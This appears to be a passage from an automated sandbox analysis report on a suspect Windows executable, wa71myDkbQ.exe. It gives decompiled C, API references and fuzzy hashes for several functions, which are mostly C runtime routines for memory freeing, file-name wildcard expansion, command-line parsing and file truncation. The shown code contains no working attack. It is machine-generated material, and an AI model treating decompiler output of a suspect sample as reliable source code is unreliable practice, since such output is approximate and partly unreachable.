Instruction Fuzzy Hash: D601F932245B00AB922226757C85AEB266E9BE57A9731013FF515922D2EF7C8C82415E

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA1E, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA1E(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x438170; // 0x438168
					if(_t23 != 0) {
						E004155C5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x438174; // 0x4397d8
					if(_t24 != 0) {
						E004155C5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x438178; // 0x4397d8
					if(_t25 != 0) {
						E004155C5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4381a0; // 0x43816c
					if(_t26 != 0) {
						E004155C5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x4381a4; // 0x4397dc
					if(_t27 != 0) {
						return E004155C5(_t6);
					}
				}
				return _t6;
			}

0x0041fa24
0x0041fa29
0x0041fa2d
0x0041fa33
0x0041fa36
0x0041fa3b
0x0041fa3f
0x0041fa45
0x0041fa48
0x0041fa4d
0x0041fa51
0x0041fa57
0x0041fa5a
0x0041fa5f
0x0041fa63
0x0041fa69
0x0041fa6c
0x0041fa71
0x0041fa72
0x0041fa75
0x0041fa7b
0x00000000
0x0041fa83
0x0041fa7b
0x0041fa86

APIs

_free.LIBCMT ref: 0041FA36

Part of subcall function 004155C5: HeapFree.KERNEL32(00000000,00000000,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?), ref: 004155DB
Part of subcall function 004155C5: GetLastError.KERNEL32(?,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?,?), ref: 004155ED

_free.LIBCMT ref: 0041FA48
_free.LIBCMT ref: 0041FA5A
_free.LIBCMT ref: 0041FA6C
_free.LIBCMT ref: 0041FA7E

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 81a70c188e94424973c00f9a85fca61a755171ea1b0d7a7e052d03e07c950491
Instruction ID: f080009b454b8fa3d73a7965dfddd92be61eab2b2a5c9600b7ea1801fd7e5043
Opcode Fuzzy Hash: 81a70c188e94424973c00f9a85fca61a755171ea1b0d7a7e052d03e07c950491
Instruction Fuzzy Hash: 6BF0E132504700AB8910DB65E981CD777FEAF84754794181EF448D7601CA3CFDC28A5C

Uniqueness

Uniqueness Score: -1.00%

Function 004166A3, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004166A3(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x438898; // 0xa22aa8
					if(_t7 != 0x438678) {
						E004155C5(_t7);
						 *0x438898 = 0x438678;
					}
				}
				E004155C5( *0x439d58);
				 *0x439d58 = 0;
				E004155C5( *0x439d5c);
				 *0x439d5c = 0;
				E004155C5( *0x439e60);
				 *0x439e60 = 0;
				E004155C5( *0x439e64);
				 *0x439e64 = 0;
				return 1;
			}

0x004166ac
0x004166b0
0x004166b2
0x004166be
0x004166c1
0x004166c7
0x004166c7
0x004166be
0x004166d3
0x004166e0
0x004166e6
0x004166f1
0x004166f7
0x00416702
0x00416708
0x00416710
0x00416719

APIs

_free.LIBCMT ref: 004166C1

Part of subcall function 004155C5: HeapFree.KERNEL32(00000000,00000000,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?), ref: 004155DB
Part of subcall function 004155C5: GetLastError.KERNEL32(?,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?,?), ref: 004155ED

_free.LIBCMT ref: 004166D3
_free.LIBCMT ref: 004166E6
_free.LIBCMT ref: 004166F7
_free.LIBCMT ref: 00416708

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 78c8ee0217d437367089ef67a8477d47713f93d667bc10d76115ae4dba2f89c5
Instruction ID: 6e3895769e52f98e38bdfe9addfb1abd0c30b1f1ea51d67bb52ec665c8a0ac89
Opcode Fuzzy Hash: 78c8ee0217d437367089ef67a8477d47713f93d667bc10d76115ae4dba2f89c5
Instruction Fuzzy Hash: DCF05E71800B20EBCB01AF65BC034D57BBAEB44728301252FF014922B9DBB91D81CF8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041E225, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0041E225(signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __edi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				char* _t124;
				signed int _t127;
				signed int _t130;
				void* _t135;
				void* _t137;
				signed int _t138;
				signed int _t141;
				signed int _t143;
				signed int _t145;
				signed int* _t146;
				signed int _t149;
				void* _t152;
				CHAR* _t153;
				char _t156;
				char _t158;
				intOrPtr* _t161;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				void* _t167;
				intOrPtr* _t168;
				signed int _t172;
				signed int _t176;
				signed int _t177;
				intOrPtr* _t182;
				void* _t191;
				intOrPtr _t192;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				union _FINDEX_INFO_LEVELS _t201;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;
				intOrPtr _t212;
				void* _t213;
				signed int _t217;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				signed int _t224;
				void* _t225;
				void* _t226;

				_t80 = _a8;
				_t222 = _t221 - 0x20;
				if(_t80 != 0) {
					_t206 = _a4;
					_t158 = 0;
					 *_t80 = 0;
					_t197 = 0;
					_t149 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t206;
					if( *_t206 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t149 - _t197;
						_v8 = _t158;
						_t189 = (_t82 >> 2) + 1;
						__eflags = _t149 - _t197;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t208;
						if(_t208 != 0) {
							_t195 = _t197;
							_t156 = _t158;
							do {
								_t182 =  *_t195;
								_t17 = _t182 + 1; // 0x1
								_v8 = _t17;
								do {
									_t141 =  *_t182;
									_t182 = _t182 + 1;
									__eflags = _t141;
								} while (_t141 != 0);
								_t156 = _t156 + 1 + _t182 - _v8;
								_t195 = _t195 + 4;
								_t143 = _v12 + 1;
								_v12 = _t143;
								__eflags = _t143 - _t208;
							} while (_t143 != _t208);
							_t189 = _v16;
							_v8 = _t156;
							_t149 = _v336.cAlternateFileName;
						}
						_t209 = E00415FB8(_t189, _v8, 1);
						_t223 = _t222 + 0xc;
						__eflags = _t209;
						if(_t209 != 0) {
							_t87 = _t209 + _v16 * 4;
							_v20 = _t87;
							_t190 = _t87;
							_v16 = _t87;
							__eflags = _t197 - _t149;
							if(_t197 == _t149) {
								L23:
								_t198 = 0;
								__eflags = 0;
								 *_a8 = _t209;
								goto L24;
							} else {
								_t93 = _t209 - _t197;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t161 =  *_t197;
									_v12 = _t161 + 1;
									do {
										_t95 =  *_t161;
										_t161 = _t161 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t162 = _t161 - _v12;
									_t35 = _t162 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E004234BC(_t162, _t190, _v20 - _t190 + _v8,  *_t197);
									_t223 = _t223 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00413735();
										asm("int3");
										_t219 = _t223;
										_push(_t162);
										_t163 = _v64;
										_t47 = _t163 + 1; // 0x1
										_t191 = _t47;
										do {
											_t103 =  *_t163;
											_t163 = _t163 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t197);
										_t200 = _a8;
										_t165 = _t163 - _t191 + 1;
										_v12 = _t165;
										__eflags = _t165 - (_t103 | 0xffffffff) - _t200;
										if(_t165 <= (_t103 | 0xffffffff) - _t200) {
											_push(_t149);
											_t50 = _t200 + 1; // 0x1
											_t152 = _t50 + _t165;
											_t211 = E00414C69(_t165, _t152, 1);
											_t167 = _t209;
											__eflags = _t200;
											if(_t200 == 0) {
												L34:
												_push(_v12);
												_t152 = _t152 - _t200;
												_t108 = E004234BC(_t167, _t211 + _t200, _t152, _v0);
												_t224 = _t223 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t135 = E0041E5F4(_a12, __eflags, _t211);
													E004155C5(0);
													_t137 = _t135;
													goto L36;
												}
											} else {
												_push(_t200);
												_t138 = E004234BC(_t167, _t211, _t152, _a4);
												_t224 = _t223 + 0x10;
												__eflags = _t138;
												if(_t138 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00413735();
													asm("int3");
													_push(_t219);
													_t220 = _t224;
													_t225 = _t224 - 0x150;
													_t111 =  *0x438070; // 0xf2c84916
													_v116 = _t111 ^ _t220;
													_t168 = _v100;
													_push(_t152);
													_t153 = _v104;
													_push(_t211);
													_t212 = _v96;
													_push(_t200);
													_v440 = _t212;
													while(1) {
														__eflags = _t168 - _t153;
														if(_t168 == _t153) {
															break;
														}
														_t113 =  *_t168;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t168 = E00423D90(_t153, _t168);
																	continue;
																}
															}
														}
														break;
													}
													_t192 =  *_t168;
													__eflags = _t192 - 0x3a;
													if(_t192 != 0x3a) {
														L47:
														_t201 = 0;
														__eflags = _t192 - 0x2f;
														if(_t192 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t192 - 0x5c;
															if(_t192 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t192 - 0x3a;
																if(_t192 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t168 - _t153 + 0x00000001;
														E0040BDD0(_t201,  &_v336, _t201, 0x140);
														_t226 = _t225 + 0xc;
														_t213 = FindFirstFileExA(_t153, _t201,  &_v336, _t201, _t201, _t201);
														_t123 = _v340;
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															_t172 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t172;
															_v348 = _t172 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t153);
																	_push(_t123);
																	L28();
																	_t226 = _t226 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t176 = _v291;
																	__eflags = _t176;
																	if(_t176 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t176 - 0x2e;
																		if(_t176 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t127 = FindNextFileA(_t213,  &_v336);
																__eflags = _t127;
																_t123 = _v340;
															} while (_t127 != 0);
															_t193 =  *_t123;
															_t177 = _v348;
															_t130 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t177 - _t130;
															if(_t177 != _t130) {
																E004239B0(_t193 + _t177 * 4, _t130 - _t177, 4, E0041E20D);
															}
														} else {
															_push(_t123);
															_push(_t201);
															_push(_t201);
															_push(_t153);
															L28();
															L54:
															_t201 = _t123;
														}
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															FindClose(_t213);
														}
														_t124 = _t201;
													} else {
														_t124 =  &(_t153[1]);
														__eflags = _t168 - _t124;
														if(_t168 == _t124) {
															goto L47;
														} else {
															_push(_t212);
															_push(0);
															_push(0);
															_push(_t153);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t220;
													E0040AEA8();
													return _t124;
												} else {
													goto L34;
												}
											}
										} else {
											_t137 = 0xc;
											L36:
											return _t137;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t194 = _v16;
									 *((intOrPtr*)(_v24 + _t197)) = _t194;
									_t197 = _t197 + 4;
									_t190 = _t194 + _v12;
									_v16 = _t194 + _v12;
									__eflags = _t197 - _t149;
								} while (_t197 != _t149);
								goto L23;
							}
						} else {
							_t198 = _t197 | 0xffffffff;
							L24:
							E004155C5(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t158;
							_t145 = E00423D50( *_t206,  &_v8);
							__eflags = _t145;
							if(_t145 != 0) {
								_push( &_v36);
								_push(_t145);
								_push( *_t206);
								L38();
								_t222 = _t222 + 0xc;
							} else {
								_t145 =  &_v36;
								_push(_t145);
								_push(0);
								_push(0);
								_push( *_t206);
								L28();
								_t222 = _t222 + 0x10;
							}
							_t198 = _t145;
							__eflags = _t198;
							if(_t198 != 0) {
								break;
							}
							_t206 = _t206 + 4;
							_t158 = 0;
							__eflags =  *_t206;
							if( *_t206 != 0) {
								continue;
							} else {
								_t149 = _v336.cAlternateFileName;
								_t197 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0041E5CF( &_v36);
						_t91 = _t198;
						goto L26;
					}
				} else {
					_t146 = E00413C2D();
					_t217 = 0x16;
					 *_t146 = _t217;
					E00413708();
					_t91 = _t217;
					L26:
					return _t91;
				}
				L68:
			}

0x0041e22a
0x0041e22d
0x0041e233
0x0041e24b
0x0041e24e
0x0041e252
0x0041e254
0x0041e256
0x0041e258
0x0041e25b
0x0041e25e
0x0041e261
0x0041e263
0x0041e2bb
0x0041e2bb
0x0041e2c1
0x0041e2c3
0x0041e2ce
0x0041e2d2
0x0041e2d4
0x0041e2d7
0x0041e2db
0x0041e2db
0x0041e2dd
0x0041e2df
0x0041e2e1
0x0041e2e3
0x0041e2e3
0x0041e2e5
0x0041e2e8
0x0041e2eb
0x0041e2eb
0x0041e2ed
0x0041e2ee
0x0041e2ee
0x0041e2f9
0x0041e2fb
0x0041e2fe
0x0041e2ff
0x0041e302
0x0041e302
0x0041e306
0x0041e309
0x0041e30c
0x0041e30c
0x0041e31a
0x0041e31c
0x0041e31f
0x0041e321
0x0041e32b
0x0041e32e
0x0041e331
0x0041e333
0x0041e336
0x0041e338
0x0041e388
0x0041e38b
0x0041e38b
0x0041e38d
0x00000000
0x0041e33a
0x0041e33c
0x0041e33c
0x0041e33e
0x0041e341
0x0041e341
0x0041e346
0x0041e349
0x0041e349
0x0041e34b
0x0041e34c
0x0041e34c
0x0041e350
0x0041e353
0x0041e353
0x0041e356
0x0041e359
0x0041e366
0x0041e36b
0x0041e36e
0x0041e370
0x0041e3aa
0x0041e3ab
0x0041e3ac
0x0041e3ad
0x0041e3ae
0x0041e3af
0x0041e3b4
0x0041e3b8
0x0041e3ba
0x0041e3bb
0x0041e3be
0x0041e3be
0x0041e3c1
0x0041e3c1
0x0041e3c3
0x0041e3c4
0x0041e3c4
0x0041e3cd
0x0041e3ce
0x0041e3d1
0x0041e3d4
0x0041e3d7
0x0041e3d9
0x0041e3e0
0x0041e3e2
0x0041e3e5
0x0041e3ef
0x0041e3f2
0x0041e3f3
0x0041e3f5
0x0041e409
0x0041e409
0x0041e40c
0x0041e416
0x0041e41b
0x0041e41e
0x0041e420
0x00000000
0x0041e422
0x0041e426
0x0041e42f
0x0041e435
0x00000000
0x0041e438
0x0041e3f7
0x0041e3f7
0x0041e3fd
0x0041e402
0x0041e405
0x0041e407
0x0041e43e
0x0041e440
0x0041e441
0x0041e442
0x0041e443
0x0041e444
0x0041e445
0x0041e44a
0x0041e44d
0x0041e44e
0x0041e450
0x0041e456
0x0041e45d
0x0041e460
0x0041e463
0x0041e464
0x0041e467
0x0041e468
0x0041e46b
0x0041e46c
0x0041e48d
0x0041e48d
0x0041e48f
0x00000000
0x00000000
0x0041e474
0x0041e476
0x0041e478
0x0041e47a
0x0041e47c
0x0041e47e
0x0041e480
0x0041e48b
0x00000000
0x0041e48b
0x0041e480
0x0041e47c
0x00000000
0x0041e478
0x0041e491
0x0041e493
0x0041e496
0x0041e4af
0x0041e4af
0x0041e4b1
0x0041e4b4
0x0041e4c4
0x0041e4c6
0x0041e4c6
0x0041e4b6
0x0041e4b6
0x0041e4b9
0x00000000
0x0041e4bb
0x0041e4bb
0x0041e4be
0x00000000
0x0041e4c0
0x0041e4c0
0x0041e4c0
0x0041e4be
0x0041e4b9
0x0041e4d4
0x0041e4d8
0x0041e4e6
0x0041e4eb
0x0041e500
0x0041e502
0x0041e508
0x0041e50b
0x0041e53d
0x0041e53d
0x0041e542
0x0041e548
0x0041e548
0x0041e54f
0x0041e569
0x0041e569
0x0041e56a
0x0041e570
0x0041e576
0x0041e577
0x0041e578
0x0041e57d
0x0041e580
0x0041e582
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e551
0x0041e551
0x0041e557
0x0041e559
0x00000000
0x0041e55b
0x0041e55b
0x0041e55e
0x00000000
0x0041e560
0x0041e560
0x0041e567
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e567
0x0041e55e
0x0041e559
0x00000000
0x0041e584
0x0041e58c
0x0041e592
0x0041e594
0x0041e594
0x0041e59c
0x0041e5a1
0x0041e5a9
0x0041e5ac
0x0041e5ae
0x0041e5c2
0x0041e5c7
0x0041e50d
0x0041e50d
0x0041e50e
0x0041e50f
0x0041e510
0x0041e511
0x0041e519
0x0041e519
0x0041e519
0x0041e51b
0x0041e51e
0x0041e521
0x0041e521
0x0041e527
0x0041e498
0x0041e498
0x0041e49b
0x0041e49d
0x00000000
0x0041e49f
0x0041e49f
0x0041e4a2
0x0041e4a3
0x0041e4a4
0x0041e4a5
0x0041e4aa
0x0041e49d
0x0041e529
0x0041e52e
0x0041e531
0x0041e539
0x00000000
0x00000000
0x00000000
0x0041e407
0x0041e3db
0x0041e3dd
0x0041e439
0x0041e43d
0x0041e43d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e372
0x0041e375
0x0041e378
0x0041e37b
0x0041e37e
0x0041e381
0x0041e384
0x0041e384
0x00000000
0x0041e341
0x0041e323
0x0041e323
0x0041e38f
0x0041e391
0x00000000
0x0041e396
0x0041e265
0x0041e265
0x0041e268
0x0041e271
0x0041e274
0x0041e27b
0x0041e27d
0x0041e296
0x0041e297
0x0041e298
0x0041e29a
0x0041e29f
0x0041e27f
0x0041e27f
0x0041e282
0x0041e283
0x0041e285
0x0041e287
0x0041e289
0x0041e28e
0x0041e28e
0x0041e2a2
0x0041e2a4
0x0041e2a6
0x00000000
0x00000000
0x0041e2ac
0x0041e2af
0x0041e2b1
0x0041e2b3
0x00000000
0x0041e2b5
0x0041e2b5
0x0041e2b8
0x00000000
0x0041e2b8
0x00000000
0x0041e2b3
0x0041e397
0x0041e39a
0x0041e39f
0x00000000
0x0041e3a2
0x0041e235
0x0041e235
0x0041e23c
0x0041e23d
0x0041e23f
0x0041e244
0x0041e3a3
0x0041e3a7
0x0041e3a7
0x00000000

APIs

_strpbrk.LIBCMT ref: 0041E274
_free.LIBCMT ref: 0041E391

Part of subcall function 00413735: IsProcessorFeaturePresent.KERNEL32(00000017,00413707,00000000,?,?,?,?,00000016,?,?,00413714,00000000,00000000,00000000,00000000,00000000), ref: 00413737
Part of subcall function 00413735: GetCurrentProcess.KERNEL32(C0000417), ref: 00413759
Part of subcall function 00413735: TerminateProcess.KERNEL32(00000000), ref: 00413760

Strings

*?, xrefs: 0041E268
., xrefs: 0041E548

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 3f9eae66db19c5f3065f95975004fb607de4ae2b894aa679414de62bf52bb83a
Instruction ID: f0f581476df226f2b9bb78c6e24fae62996f4d690cc429ad6da9151834c6126e
Opcode Fuzzy Hash: 3f9eae66db19c5f3065f95975004fb607de4ae2b894aa679414de62bf52bb83a
Instruction Fuzzy Hash: DE519475E00119EFDB14DFAAC841AEEBBF5EF48314F14416EE854E7340E6399E418B54

Uniqueness

Uniqueness Score: -1.00%

Function 00415D1F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00415D1F(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0041EB95(_t52);
					GetModuleFileNameA(0, 0x439930, 0x104);
					_t49 =  *0x439e68; // 0xa034b8
					 *0x439e70 = 0x439930;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x439930;
					}
					_v8 = 0;
					_v16 = 0;
					E00415E43(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00415FB8(_v8, _v16, 1);
					if(_t64 != 0) {
						E00415E43(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0041E6B0(_t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x439e5c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x439e60 = _t59;
									L16:
									E004155C5(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x439e5c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x439e60 = _t43;
						goto L10;
					} else {
						_t44 = E00413C2D();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E004155C5(_t64);
						return _t50;
					}
				} else {
					_t45 = E00413C2D();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00413708();
					return _t65;
				}
			}

0x00415d1f
0x00415d2c
0x00415d4c
0x00415d5f
0x00415d65
0x00415d6b
0x00415d73
0x00415d7a
0x00415d7a
0x00415d7f
0x00415d86
0x00415d8d
0x00415d9f
0x00415da6
0x00415dc5
0x00415dd1
0x00415dec
0x00415def
0x00415df6
0x00415dfc
0x00415e03
0x00415e06
0x00415e08
0x00415e0c
0x00415e16
0x00415e16
0x00415e18
0x00415e1e
0x00415e21
0x00415e23
0x00415e29
0x00415e2a
0x00415e30
0x00000000
0x00000000
0x00000000
0x00000000
0x00415e0e
0x00415e0e
0x00415e0e
0x00415e11
0x00415e12
0x00000000
0x00415e0e
0x00415dfe
0x00000000
0x00415dfe
0x00415dd7
0x00415ddc
0x00415dde
0x00415de0
0x00000000
0x00415da8
0x00415da8
0x00415dad
0x00415daf
0x00415db0
0x00415de5
0x00415de5
0x00415e33
0x00415e34
0x00000000
0x00415e3d
0x00415d34
0x00415d34
0x00415d3b
0x00415d3c
0x00415d3e
0x00000000
0x00415d43

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe,00000104), ref: 00415D5F
_free.LIBCMT ref: 00415E2A
_free.LIBCMT ref: 00415E34

Strings

C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe, xrefs: 00415D56, 00415D5D, 00415D8C, 00415DC4

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe
API String ID: 2506810119-3943721903
Opcode ID: 0fab8dfaecdfa7f9b123cab222647ef4c3b5c9d94311b5b68402b0e1e06d11db
Instruction ID: 1490686c44307d1c652ab663e2cb3fcafad45691e8de803eb6fef03ff9b4d3a2
Opcode Fuzzy Hash: 0fab8dfaecdfa7f9b123cab222647ef4c3b5c9d94311b5b68402b0e1e06d11db
Instruction Fuzzy Hash: 623150B1A00618EFDB21DF9AD8859DEBBFDEBC5314B10406BE40497351D7B88E81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00424001, Relevance: 6.2, APIs: 4, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00424001(signed int __edx, signed int _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E0041B8B1(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E0041B8B1(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E0041B8B1(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E00413C2D()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E0041B8B1(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E0041F4FA(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E00413C2D())) = 0xd;
							_t30 = E00413C1A();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E00414C69(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0041693B(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E004195CF(_t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E00413C1A();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E00413C2D())) = 0xd;
										}
										L23:
										_t38 = E00413C2D();
										E004155C5(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
